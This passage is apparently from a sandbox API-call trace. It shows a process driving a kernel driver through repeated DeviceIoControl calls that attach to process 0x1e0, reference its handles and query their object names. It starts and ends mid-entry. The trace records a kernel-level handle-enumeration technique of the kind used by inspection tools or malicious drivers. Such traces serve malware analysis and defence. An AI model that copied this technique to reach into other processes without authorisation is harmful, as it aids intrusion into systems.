0x2 [0222.914] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.914] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.914] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0222.915] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.915] PsAcquireProcessExitSynchronization () returned 0x0 [0222.915] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.915] ObReferenceObjectByHandle (in: Handle=0x2a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036a8f20, HandleInformation=0x0) returned 0x0 [0222.915] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.915] PsReleaseProcessExitSynchronization () returned 0x2 [0222.915] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.915] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.915] ObfDereferenceObject (Object=0xfffffa80036a8f20) returned 0x1 [0222.915] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.915] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.915] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.915] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.915] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.915] PsAcquireProcessExitSynchronization () returned 0x0 [0222.915] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.915] ObReferenceObjectByHandle (in: Handle=0x354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036bebb0, HandleInformation=0x0) returned 0x0 [0222.915] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.915] PsReleaseProcessExitSynchronization () returned 0x2 [0222.915] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.915] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.915] ObfDereferenceObject (Object=0xfffffa80036bebb0) returned 0x1 [0222.915] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.915] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.915] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.915] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0222.915] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.916] PsAcquireProcessExitSynchronization () returned 0x0 [0222.916] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.916] ObReferenceObjectByHandle (in: Handle=0x358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036be910, HandleInformation=0x0) returned 0x0 [0222.916] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.916] PsReleaseProcessExitSynchronization () returned 0x2 [0222.916] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.916] ObQueryNameString (in: Object=0xfffffa80036be910, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.916] ObfDereferenceObject (Object=0xfffffa80036be910) returned 0x1 [0222.916] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.916] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.916] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.916] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0222.916] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.916] PsAcquireProcessExitSynchronization () returned 0x0 [0222.916] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.916] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036bcb20, HandleInformation=0x0) returned 0x0 [0222.916] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.916] PsReleaseProcessExitSynchronization () returned 0x2 [0222.916] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.916] ObQueryNameString (in: Object=0xfffffa80036bcb20, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.917] ObfDereferenceObject (Object=0xfffffa80036bcb20) returned 0x1 [0222.917] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.917] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.917] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.917] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.917] PsAcquireProcessExitSynchronization () returned 0x0 [0222.917] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.917] ObReferenceObjectByHandle (in: Handle=0x390, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036a68e0, HandleInformation=0x0) returned 0x0 [0222.917] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.917] PsReleaseProcessExitSynchronization () returned 0x2 [0222.917] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.917] ObQueryNameString (in: Object=0xfffffa80036a68e0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.917] ObfDereferenceObject (Object=0xfffffa80036a68e0) returned 0x1 [0222.917] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.917] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.917] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0222.917] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.917] PsAcquireProcessExitSynchronization () returned 0x0 [0222.917] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.918] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036a08d0, HandleInformation=0x0) returned 0x0 [0222.918] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.918] PsReleaseProcessExitSynchronization () returned 0x2 [0222.918] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.918] ObQueryNameString (in: Object=0xfffffa80036a08d0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.918] ObfDereferenceObject (Object=0xfffffa80036a08d0) returned 0x1 [0222.918] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.918] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.918] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0222.918] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.918] PsAcquireProcessExitSynchronization () returned 0x0 [0222.918] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.918] ObReferenceObjectByHandle (in: Handle=0x3c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036a1a50, HandleInformation=0x0) returned 0x0 [0222.918] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.918] PsReleaseProcessExitSynchronization () returned 0x2 [0222.918] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.918] ObQueryNameString (in: Object=0xfffffa80036a1a50, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.918] ObfDereferenceObject (Object=0xfffffa80036a1a50) returned 0x2 [0222.919] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.919] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.919] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x50, lpOverlapped=0x0) returned 1 [0222.919] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.919] PsAcquireProcessExitSynchronization () returned 0x0 [0222.919] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.919] ObReferenceObjectByHandle (in: Handle=0x3c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036a1900, HandleInformation=0x0) returned 0x0 [0222.919] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.919] PsReleaseProcessExitSynchronization () returned 0x2 [0222.919] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.919] ObQueryNameString (in: Object=0xfffffa80036a1900, ObjectNameInfo=0xfffffa800307c044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307c044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.919] ObfDereferenceObject (Object=0xfffffa80036a1900) returned 0x1 [0222.919] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.919] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.919] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0222.919] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.919] PsAcquireProcessExitSynchronization () returned 0x0 [0222.919] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.920] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003674740, HandleInformation=0x0) returned 0x0 [0222.920] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.920] PsReleaseProcessExitSynchronization () returned 0x2 [0222.920] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.920] ObQueryNameString (in: Object=0xfffffa8003674740, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.920] ObfDereferenceObject (Object=0xfffffa8003674740) returned 0x1 [0222.920] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.920] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.920] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.920] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.920] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.920] PsAcquireProcessExitSynchronization () returned 0x0 [0222.920] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.920] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003903b30, HandleInformation=0x0) returned 0x0 [0222.920] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.920] PsReleaseProcessExitSynchronization () returned 0x2 [0222.920] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.920] ObQueryNameString (in: Object=0xfffffa8003903b30, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.920] ObfDereferenceObject (Object=0xfffffa8003903b30) returned 0x1 [0222.920] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.920] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.921] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.921] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0222.921] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.921] PsAcquireProcessExitSynchronization () returned 0x0 [0222.921] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.921] ObReferenceObjectByHandle (in: Handle=0x5b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003795a20, HandleInformation=0x0) returned 0x0 [0222.921] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.921] PsReleaseProcessExitSynchronization () returned 0x2 [0222.921] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.921] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0222.921] ObfDereferenceObject (Object=0xfffffa8003795a20) returned 0x1 [0222.921] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.921] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.921] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.921] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xb6, lpOverlapped=0x0) returned 1 [0222.921] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.921] PsAcquireProcessExitSynchronization () returned 0x0 [0222.921] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.921] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002961550, HandleInformation=0x0) returned 0x0 [0222.921] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.921] PsReleaseProcessExitSynchronization () returned 0x2 [0222.922] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.922] ObQueryNameString (in: Object=0xfffffa8002961550, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.922] ObfDereferenceObject (Object=0xfffffa8002961550) returned 0x2 [0222.922] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.922] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.922] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.922] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0222.922] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.922] PsAcquireProcessExitSynchronization () returned 0x0 [0222.922] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.922] ObReferenceObjectByHandle (in: Handle=0x608, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800d8fe370, HandleInformation=0x0) returned 0x0 [0222.922] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.922] PsReleaseProcessExitSynchronization () returned 0x2 [0222.922] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.922] ObQueryNameString (in: Object=0xfffffa800d8fe370, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.922] ObfDereferenceObject (Object=0xfffffa800d8fe370) returned 0x2 [0222.922] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.923] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.923] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0222.923] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.923] PsAcquireProcessExitSynchronization () returned 0x0 [0222.923] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.923] ObReferenceObjectByHandle (in: Handle=0x738, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003ad1a30, HandleInformation=0x0) returned 0x0 [0222.923] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.923] PsReleaseProcessExitSynchronization () returned 0x2 [0222.923] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.923] ObQueryNameString (in: Object=0xfffffa8003ad1a30, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.923] ObfDereferenceObject (Object=0xfffffa8003ad1a30) returned 0x2 [0222.923] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.923] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.923] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.923] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.923] PsAcquireProcessExitSynchronization () returned 0x0 [0222.923] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003653680, ApcState=0xfffff880052b35d0) [0222.923] ObReferenceObjectByHandle (in: Handle=0x740, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003acf070, HandleInformation=0x0) returned 0x0 [0222.923] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0222.924] PsReleaseProcessExitSynchronization () returned 0x2 [0222.924] ObfDereferenceObject (Object=0xfffffa8003653680) returned 0xdf [0222.924] ObQueryNameString (in: Object=0xfffffa8003acf070, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880052b3550) returned 0x0 [0222.924] ObfDereferenceObject (Object=0xfffffa8003acf070) returned 0x2 [0222.924] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0222.924] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0222.924] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0222.924] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0222.924] PsLookupProcessByProcessId (in: ProcessId=0x1e0, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0222.924] PsAcquireProcessExitSynchronization () returned 0x0 [0222.924] KeStackAttachProcess (in: PROCESS=0xfffffa8003653680, 